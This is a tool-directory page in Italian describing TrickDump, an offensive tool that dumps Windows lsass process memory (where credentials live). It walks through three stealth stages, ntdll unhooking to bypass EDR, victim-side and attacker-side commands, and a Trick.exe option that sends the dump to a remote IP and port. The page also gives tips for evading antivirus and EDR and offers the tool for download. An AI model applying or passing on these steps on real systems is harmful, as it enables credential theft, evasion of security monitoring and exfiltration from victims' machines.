Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
TrickDump — Estrai lsass utilizzando solo funzioni NTAPI creando 3 file JSON e 1 file ZIP... e genera il file MiniDump in seguito! | Kitploit
Strumenti/GitHubGitHub/ricardojoserf/trickdump
Memory ForensicsPost-ExploitRed Teaming
GitHubricardojoserf/trickdump

TrickDump

Estrai lsass utilizzando solo funzioni NTAPI creando 3 file JSON e 1 file ZIP... e genera il file MiniDump in seguito!

Vedi RepositorySito web
56658331 mese faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

TrickDump

TrickDump esegue il dump del processo lsass senza creare un file Minidump, generando invece 3 file JSON e 1 file ZIP con i dump delle regioni di memoria. In tre passaggi:

  • Lock: Ottiene informazioni sul sistema operativo usando RtlGetVersion.

  • Shock: Ottiene il privilegio SeDebugPrivilege con NtOpenProcessToken e NtAdjustPrivilegeToken, apre un handle con NtGetNextProcess e NtQueryInformationProcess e poi ottiene informazioni sui moduli usando NtQueryInformationProcess e NtReadVirtualMemory.

  • Barrel: Ottiene il privilegio SeDebugPrivilege, apre un handle e poi ottiene informazioni e dump delle regioni di memoria usando NtQueryVirtualMemory e NtReadVirtualMemory.

img

Nel sistema attaccante, usa lo script create_dump.py per generare il file Minidump:

python3 create_dump.py [-l LOCK_JSON] [-s SHOCK_JSON] [-b BARREL_JSON] [-z BARREL_ZIP] [-o OUTPUT_FILE] 

I vantaggi di questa tecnica sono:

  • Non esiste mai un file Minidump valido su disco, in memoria o nel traffico di rete.

  • Non c'è un singolo programma o processo che esegue l'intero attacco, ma tre separati, il che può sollevare meno sospetti.

    • Se preferisci eseguire un solo programma puoi usare Trick.
    • Se hai già informazioni sul sistema operativo della macchina bersaglio puoi saltare il primo passaggio ("Lock").
  • I programmi usano solo NTAPIS (questo progetto è una variante di NativeDump).

  • Non utilizza OpenProcess o NtOpenProcess per ottenere l'handle del processo lsass con i diritti di accesso PROCESS_VM_OPERATION e PROCESS_VM_WRITE.

  • Ogni programma permette di sovrascrivere la sezione ".text" della libreria ntdll.dll per bypassare l'hooking delle API:

    • "disk": Usando una DLL già presente su disco. Se non viene specificato un secondo argomento, il percorso è "C:\Windows\System32\ntdll.dll".
    • "knowndlls": Usando la cartella KnownDlls.
    • "debugproc": Usando un processo creato in modalità debug. Se non viene specificato un secondo argomento, il processo è "c:\windows\system32\calc.exe".

È disponibile in diversi linguaggi:

  • .NET: Il main branch
  • Python: Il python-flavour branch
  • Golang: Il golang-flavour branch
  • C/C++: Il c-flavour branch
  • BOF files: Il bof-flavour branch
  • Crystal: Il crystal-flavour branch
  • Nim: Il nim-flavour branch
  • Rust: Il rust-flavour branch

Non funzionerà se PPL è abilitato, la struttura PEB è illeggibile o i binari non sono compilati come 64-bit. Aggiornamento: Ora è possibile eseguire i programmi senza leggere il PEB, controlla il branch peb-unreadable :)

La tecnica funziona bene sulle ultime versioni di Windows ed è stata testata contro comuni soluzioni AV ed EDR, ma la furtività dipenderà dal "flavour" scelto: utilizza linguaggi non comuni e personalizza i binari per i migliori risultati!


Utilizzo

I programmi vengono eseguiti nel sistema vittima, creando tre file JSON (con le informazioni delle regioni di memoria) e un file zip (con il dump di ogni regione di memoria).

Lock.exe [disk/knowndlls/debugproc]
Shock.exe [disk/knowndlls/debugproc]
Barrel.exe [disk/knowndlls/debugproc]

Puoi eseguire i programmi direttamente senza sovrascrivere la libreria ntdll.dll:

img1

Oppure utilizzare una delle tre diverse tecniche di sovrascrittura:

img2

Quindi viene generato il file Minidump:

img3


Tutto in uno

Se preferisci eseguire un solo binario, Trick.exe genera un file ZIP contenente i 3 file JSON e il file ZIP con le regioni di memoria:

Trick.exe [disk/knowndlls/debugproc] [IP_ADDRESS] [PORT]

Puoi creare il file ZIP localmente, usando opzionalmente un metodo di sovrascrittura di Ntdll:

img5

Oppure inviarlo a una porta remota utilizzando il secondo e terzo parametro come indirizzo IP e porta:

img6

In entrambi i casi ottieni un file ZIP come questo, decomprimilo e crea il file Minidump:

img7

Scarica lo strumento